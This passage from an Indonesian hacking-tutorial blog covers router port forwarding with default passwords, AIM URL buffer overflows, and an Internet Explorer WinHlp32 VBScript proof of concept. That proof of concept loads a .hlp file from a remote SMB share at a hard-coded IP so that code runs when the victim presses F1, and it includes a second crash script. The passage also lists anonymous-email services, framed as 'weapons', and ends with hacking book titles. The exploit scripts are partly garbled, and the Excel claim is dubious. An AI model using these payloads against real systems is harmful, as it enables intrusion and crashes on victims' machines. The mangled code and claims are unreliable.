Password modem Anda. Bila belum diubah defaultnya biasanya admin dan admin
atau user dan user
·
c). Bila login diterima, tampil
Cpanel modem
·
d). Klick Advanced Setup > NAT
> Virtual Server
·
e). Tampil halaman Virtual Server.
Lakukan pengaturan :
·
* Rule Index. Bila belum ada port,
tulis 1. Bila pada baris 1 sudah ada port, tulis 2. Bila membuat port lebih
dari 1,
tulis urutannya.
·
* Applikcation. Bagian ini
kosongkan
·
* Protocol. Pilih All. Agar semua
protocol TCP/IP bias masuk Router
·
* Start Port Number. Isi sesuka
anda dg angka 1 – 65535 Misal 18, 31, 101, 1000, 12000 dst.
Jangan mengisi dg port yg sudah
terpakai. Misal SSH port 22, Telnet port 23, SMTP port 24 dsb. Coba isikan 1000
·
*. End Port Number. Isikan sama dg
Start Port Number (1000)
·
*. Local IP Address. Masukkan IP
Address Laptop Anda 192.168.1. 100
·
*. Klick Save
·
*. Data Anda telah masuk table
pada baris 1
·
*. Anda boleh membuat Port lagi
pada Rule (baris) ke 2 dst.
·
*. Jika terjadi perubahan Port
bias dihapus dg klick Delete. Masukkan Port baru
216.
BUFFER OVERFLOW
Program
Exploit biasa ditulis dalam bahasa C atau Perl. Dipakai untuk mengexploitasi
bug atau kesalahan pada program.
Ada beberapa bug pemrograman yg sering diexploitasi seperti Buffer Overflow,
Format Strings, Heap Overflow.
Buffer Overflow
berarti buffer tidak mampu memuat data yg berlebih dari daya tampungnya. Dapat
dicoba pada program
chatting berikut :
Software
: AIM (AOL Instant Messenger) 4.1.2010
Memiliki
buffer overflow yg bisa diexploit.
Atau Software : AIM 3.5.1856
Atau software : AIM 4.0
Atau software : AIM Instant Messenger 4.2.1193
AIM
menggunakan protocol AIM:// (lewat URL)
Terdapat
buffer overflow pada URL, yaitu parameter goim dan screenname istilah lain
untuk nickname dan username.
AIM juga
bisa diakses tidak lewat URL. Dg membuat link dalam halaman
html.
Setiap URL
aim:// akan dikirim langsung ke klient AIM.
Untuk
Mozilla Firefox : muncul kotak dialog > Klick OK
> berikan tanda chentang pada Bag. Remember my choice for aim link
Untuk
Internet Explorer : kotak dialog tidak muncul. Langsung jalan.
Perintah
Restsrt bisa mematikan secara paksa computer target dan tampil pesan error.
Target terpaksa menjalankan
ulang programnya.
BUFFER
OVERFLOW Internet Explorer 6, 7, 8 pada Windows XP
Bug
(kesalahan) pada Internet Explorer 6, 7, 8 yg dapat diexploitasi menggunakan
file.HLP Dimungkinkan memanggil
WinHlp32,exe dari Internet Explorer 6, 7, 8
menggunakan VBScript menggunakan parameter sbb :
MsgBox (prompt[,buttons][,title][,helpfile,contect])
Melalui
HLP memingkinkan seseorang menjalankan perintah secara remote.
Terdapat kerentanan stack overflow dalam
file WinHlp32.exe
Ketika
VBScript memproses fungsi MsgBox dg parameter file.HLP yg telah dimodifikasi,
muncul MessageBox. Jika target
menekan F1 kode berbahaya yg dipasang dapat berjalan secara remote pada target.
Bila isi
parameter file.HLP panjang terjadi stack -based buffer overflow dan terjadi
crash
UJICOBA
Buka http://poc-isec27/
Script
untuk kedua tombolnya sbb :
<script
type=”text/vbscript”>// ![CDATA[
// PoC
pertama
Big = \\184.73.14.110\PUBLIC\test.hlp
MsgBox
“please press F1 to save the world”, ,”please save the
world”
, big, 1
MsgBox
“press F1 to closethis annoying popup”, ,””, big, 1
MsgBox
“press F1 to closethis annoying popup”, ,””, big, 1
// ]]></script>
Dan script
yg kedua :
<script
type=”text/vbscript”>// <![CDATA]
// PoC
kedua
big
= “aaaa”
For 1=1 to
4500
big
= big &$038; “\..\”
Next
MsgBox
“please press F1 to save the world”, ,”please save the
world”, big, 1
// ]]></script>
Apabila
sctript kedua dijalankan terjadi error signature
Ternyata
file.hlp dapat diakses dari \\184.73.14.110\PUBLIC\test.hlp
Yg
merupakan samba share dari server dg alamat IP 184.73.14.110
Pada
Microsoft Excel 2007 punya bug walau bukan Buffer Overflow
Bug bug
ini merupakan kekhilafan programmer sekelas Microsoft.
Bug
Excel terdpat pada fungsi perkalian. Perkalian
perkalian yg seharusnya menghasilkan 65.535 selalu tampil 100.000
217.
EMAIL SEBAGAI SENJATA
Anonymous
Email / Email Kaleng
Kalau
jaman dulu ada Surat Kaleng, sekarang ada Email Kaleng yg sering digunakan
sebagai senjata hacking.
Beberapa Website
penyedia Anonymous Email gratis / berbayar :
http://www.sendanonymousemail.net/
http://www.hidemyass.com/anonymous-email/
https://www.anonymousspeech.com/
http://anonymouse.org/anonemail.html
https://www.sharpmail.co.uk/anonymous_email.html
http://ipinfo/html/anonymous-email_3.php
UJICOBA
Saya
memasukkan nama pengirim kucingku, dg alamat email kucingku@gmail.com
Isi
pesan menawarkan anak anak kucing lucu.
Buka http://www.anonymailer.net//
Setelah
selesai memasukkan kode captha > Klick Submit
Tampil
pesan Email berhasil dikirimkan.
Karena
saya menggunakan versi gratis, muncul pesan sponsor.
Klik LANJUTKAN
http://www.hackerkamdani.blogspot.com/KUMPULAN-SOFTWARE-KAMDANI.html
Efvy
Zam :
BUKU SAKTI HACKER Mediakita 2014
Yudha
Yogasara
:GOOGLE DORKS Penerbit Neomedia
Press Semarang
WAHANA KOMPUTER : Koleksi Software Gratis
untuk Hacking & Cracking Penerbit
ANDI Semarang
Dedik
Kurniawan & Java Creativity BUKU SAKTI TEKNIK
HACKING Penerbit PT ELEX MEDIA KOMPUTINDO
Rudy
Samuel Pardosi KALI LINUX TOP HACKING Jasakom
Efvy
Zam Kerinci GOOGLE HACKING Penerbit Neomedia Press Semarang
Efvy
Zamidra Zam WIRELESS HACKING
Edisi Revisi
Penerbit
PT ELEX MEDIA KOMPUTINDO
Zuhardi
Eko Rahman HACK RAPIDSHARE
& ATTACK Friendster
Penerbit
Neomedia Press Semarang
Jordan Andrean cs HACKING STREAMING
Penerbit
PT ELEX MEDIA KOMPUTINDO
Dedik
Kurniawan & Java Creativity HACKING dengan KEYLOGGER Penerbit PT Elex Media Komputindo Jakarta
Muhammad
Syukri Yudha Yogasara : TEKNIK HACKING UNTUK PEMULA
Penerbit
PT Elex Media Komputindo Jakarta
MundzirMF
: TIP & TRIK BELAJAR HACKER
Penerbit
NOTEBOOK Yogyakarta 55187
Efvy
Zamidra Zam : Trik Hacking Menggunakan Flash Disk
PT Elex
Media Komputindo Jakarta
Komentar
Posting Komentar